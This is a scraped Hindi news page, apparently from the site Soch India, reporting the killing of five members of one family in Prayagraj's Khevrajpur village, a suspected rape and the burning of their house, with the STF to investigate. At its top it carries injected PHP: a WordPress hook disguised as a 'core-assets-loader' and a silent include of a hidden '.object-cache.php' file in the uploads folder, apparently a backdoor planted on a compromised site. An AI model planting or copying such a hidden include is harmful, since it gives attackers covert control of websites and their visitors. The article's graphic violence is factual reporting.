add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बेटी-बहू के साथ रेप की आशंका, 2 साल की मासूम का भी मर्डर; STF करेगी जांच – SOCH INDIA
Menu

अपराध समाचार
बेटी-बहू के साथ रेप की आशंका, 2 साल की मासूम का भी मर्डर; STF करेगी जांच

nobanner

यूपी के प्रयागराज जिले से एक बार फिर सामूहिक हत्याकांड का मामला सामने आया है। थरवई थाना क्षेत्र के खेवराजपुर गांव में शुक्रवार आधी रात को हत्यारों ने एक ही परिवार के 5 लोगों की धारदार हथियार से गला रेत कर हत्या कर दी। हत्यारों ने 5 साल की बच्ची पर भी वार किया है, फिलहाल उसे इलाज के लिए हॉस्पिटल में भर्ती कराया गया है।

हत्या के बाद लगाई घर में आग
हत्यारों ने वारदात को अंजाम देने के बाद शवों को जलाने के लिए घर में आग लगा दी। घटनास्थल पर पुलिस, फॉरेंसिक टीम मौजूद है। मरने वालों में 5 माह की गर्भवती सविता भी शामिल थी। सविता की एक बेटी मीनाक्षी की हत्या कर दी गई है, वहीं 5 साल की दूसरी बेटी साक्षी घायल है। वहीं सविता के पति सुनील ने अपनी पत्नी और बहन दोनों के साथ रेप की आशंका भी जताई है।